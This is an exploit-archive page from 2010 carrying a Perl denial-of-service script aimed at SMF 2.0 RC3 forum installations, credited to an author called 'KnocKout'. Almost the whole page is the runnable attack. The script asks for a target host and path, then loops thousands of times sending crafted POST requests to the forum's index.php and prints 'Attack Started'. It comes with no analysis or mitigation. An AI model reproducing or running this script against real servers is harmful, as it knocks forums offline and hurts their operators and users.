SMF 2.0 RC3 - Denial Of Service Exploit
Posted on 05 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SMF 2.0 RC3 - Denial Of Service Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== SMF 2.0 RC3 - Denial Of Service Exploit(redhat) =============================================== ################################################ Author : KnocKout Thanks : DaiMon,BARCOD3 Say : " Siz kovalayin, Biz sadece Keyfi takiliyoruz. " Contact : knockoutr@msn.com Tested on : redhat LINUX ############################################## ##################SMF 2.0 RC3 -(0day) Denial Of Service Exploit(redhat)############### #!/usr/bin/perl use IO::Socket; print " +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ "; print "+ SMF 2.0 RC3 -(0day) Denial Of Service Exploit(redhat) + "; print "+ Coded by KnocKout + "; print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ "; print "Host |without http://www.| "; chomp($host = <STDIN>); print "Path |example. /en or / | "; chomp($pth = <STDIN>); { while($x != 999999) { $postit = "?topic=00.msg00#000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " Offline! - We can not Connect To '$host' it May be DoSed " unless $sock; print $sock "POST $pth/index.php HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg "; print $sock "$postit "; close($sock); syswrite STDOUT, "Attack Started "; $x++; } } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>